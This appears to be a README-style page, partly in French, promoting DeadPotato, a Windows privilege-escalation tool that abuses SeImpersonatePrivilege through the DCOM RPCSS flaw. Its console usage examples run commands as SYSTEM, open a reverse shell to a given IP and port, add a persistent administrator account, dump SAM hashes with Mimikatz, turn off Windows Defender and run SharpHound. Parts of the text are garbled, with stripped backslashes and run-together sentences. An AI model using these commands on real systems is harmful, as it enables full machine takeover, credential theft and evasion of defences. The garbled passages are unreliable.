C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
Le droit SeImpersonatePrivilege
est activé dans votre contexte ? Avec DeadPotato , il est possible d'obtenir un maximum de privilèges sur le système local.
L'outil tentera de démarrer un processus élevé s'exécutant dans le contexte de l'utilisateur NT AUTHORITYSYSTEM
en abusant de la faille RPCSS de DCOM dans la gestion des OXID, permettant un accès illimité à la machine pour que les opérations critiques soient effectuées librement.-cmd
est utilisé. De nombreux modules sont disponibles, tels que -rev IP:PORT
pour générer un shell inverse élevé, -newadmin usr:pass
pour créer un nouvel utilisateur administrateur local pour la persistance, ou -mimi sam
pour vider les hachages SAM.
Pour utiliser DeadPotato, le droit SeImpersonatePrivilege doit être activé dans le contexte actuel. Afin de vérifier cela, la commande whoami /priv
peut être exécutée. Si le privilège est désactivé, l'exploitation n'est pas possible dans le contexte actuel.
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
Ce projet "DeadPotato" est un outil construit sur le code source du chef-d'œuvre "GodPotato" de BeichenDream. Si vous aimez ce projet, assurez-vous également d'aller montrer votre soutien au projet original
BeichenDream, Benjamin DELPY gentilkiwi
, développeurs BloodHound.
Ce projet est sous licence Apache 2.0. Veuillez consulter le fichier LICENSE pour plus de détails.